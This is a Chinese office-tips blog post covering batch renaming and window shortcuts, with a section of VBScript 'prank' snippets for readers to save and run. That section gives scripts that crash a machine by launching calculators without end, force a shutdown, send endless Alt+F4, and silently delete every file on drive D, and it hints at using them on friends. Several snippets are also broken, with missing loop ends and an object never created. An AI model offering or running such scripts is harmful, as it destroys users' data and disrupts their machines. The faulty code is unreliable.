办公技巧篇1:几种简单实用的办公技巧,秒变大神原来是这样的感觉

2018-09-09 11:59:35 3点赞 5收藏 0评论

在办公生活中,你有木有发现一些小技巧,让你感到之前自己“慢工出细活”的方式,软件瘫痪的错觉可以称之为愚蠢至极。今天给小伙伴们分享一批简单、方便、快速的办公方式。

1、一分钟重命名千张图片

打开放有图片的文件夹,点击【Ctrl+A】全选,然后按【F2】,就可以一键重名啦,下面是GIF演示具体操作方法↓

2、vbs文件代码恶搞合集

首先,新建一个TXT文档,输入msgbox "一大波病毒正在靠近..." ,点击文件--另存为--重命名,你可以起任何名称,但是后缀必须是.vbs。

然后,双击打开该文件,就可以看到一个弹出,上面写着一大波病毒正在靠近...

如果,一行恶搞太单调,你还可以多写几行文字,或是换换内容,来个无限循环,这时候点击确定和关闭按钮之后,再一次弹出窗口,如此循环,无法正常关闭。

vbs代码合集

步骤:新建一个TXT文档,将下面的代码复制到文档中,然后保存成vbs格式,你可以看看效果哟!

1)恶搞

do

msgbox "You are foolish!"

2)不断打开计算机,直到死机

set wsh=createobject("wscript.shell")

do

wsh.run "calc"

3)关机

dim WSHshell

set WSHshell = wscript.createobject("wscript.shell")

WSHshell.run "shutdown -f -s -t 00",0 ,true

4)删除D盘所有文件

dim WSHshell

WSHshell.run "cmd /c ""del d:*.* / f /q /s""",0 ,true

5)不断弹出窗口

while(1)

msgbox "哈哈 你被耍了!"

loop

6)不断按下alt+f4 (开什么都关闭……)

dim WSHshell

while(1)

WSHshell.SendKeys "%{F4}" loop

7)解锁方式:你需要按500次回车

dim s

do until s=500

s=s+1

msgbox "哥们,给我按500次回车吧",64

loop

注:以上代码在运行者的电脑上显示500个对话框。其中do until s=500 ,500可以随意更改。

8)关不掉的窗口

WScript.Echo("嘿,谢谢你打开我哦,我等你很久拉!"&TSName)

WScript.Echo("你是可爱的小朋吗?")

WScript.Echo("哈,我想你拉,这你都不知道吗?")

WScript.Echo("怎么才来,说~是不是不关心我")

WScript.Echo("哼,我生气拉,等你这么久,心都凉啦。")

WScript.Echo("小强很生气,后果很严重哦。")

WScript.Echo("嘿嘿!你也会很惨滴哦")

WScript.Echo("是不是想清除我?")

WScript.Echo("那你要点上50下哦,不过会给你惊喜滴")

WScript.Echo("还剩49下,快点点哦")

WScript.Echo("还剩48下,快点,小笨蛋!")

WScript.Echo("还剩47下对,就这样快点点!")

WScript.Echo("还剩46下。你啊就是笨,要快哦,我先不打扰你工作。")

WScript.Echo("还剩45下,记得要快哦!")

WScript.Echo("还剩43下")

WScript.Echo("还剩42下")

WScript.Echo("还剩41下")

WScript.Echo("还剩40下")

WScript.Echo("还剩39下")

WScript.Echo("还剩38下")

WScript.Echo("还剩37下")

WScript.Echo("还剩36下")

WScript.Echo("还剩35下")

WScript.Echo("还剩34下")

WScript.Echo("还剩33下")

WScript.Echo("还剩32下")

WScript.Echo("还剩30下")

WScript.Echo("还剩29下")

WScript.Echo("还剩28下")

WScript.Echo("还剩27下")

WScript.Echo("还剩26下")

WScript.Echo("还剩25下")

WScript.Echo("还剩24下")

WScript.Echo("还剩23下")

WScript.Echo("还剩22下")

WScript.Echo("还剩21下")

WScript.Echo("还剩20下")

WScript.Echo("还剩19下")

WScript.Echo("还剩18下")

WScript.Echo("还剩17下")

WScript.Echo("还剩16下")

WScript.Echo("还剩15下")

WScript.Echo("还剩14下")

WScript.Echo("还剩13下停停!!!慢点,我有话要说")

WScript.Echo("还剩12下,你继续点我就会消失滴")

WScript.Echo("还剩11下,以后就看不到我拉。555555")

WScript.Echo("还剩10下,你现在可以选择停止!")

WScript.Echo("还剩9下。你还点啊,不要我拉?")

WScript.Echo("还剩8下,有点伤心拉,干嘛丢弃人家")

WScript.Echo("还剩7下。疯了,你有点负意!")

WScript.Echo("还剩6下。对。你就点吧,我恨你!")

WScript.Echo("还剩5下,不明白,删除我你就好吗?")

WScript.Echo("还剩4下!真要删除我?")

WScript.Echo("还剩3下。可是我真的很眷恋你。。。")

WScript.Echo("还剩2下。不要这么绝情嘛,人家是爱你的!")

WScript.Echo("还剩1下。哼,既然你这么绝情。也别怪我无义!!!")

WScript.Echo("我本因该消失的,不过我留恋你滴芳容,上帝又给了一次机会。")

WScript.Echo("想结素我么?那你就再多点一次")

PS:如果你想要关闭,按组合键Ctrl+Shift+Esc,打开任务管理器,然后在任务管理器中结束进程就好啦。

PPS:额,好奇害死猫,机器诚可贵,不要随意试~

PPPS:友谊的小船说翻就翻~

3、一秒收起所有窗口

按组合键Windows+M,就可以一下收起所有窗口啦,不是关闭,只是收起,帮你轻松应对各种形式的查岗!

PS:组合键Windows+D,可直接显示桌面,也是收起窗口的一种方法。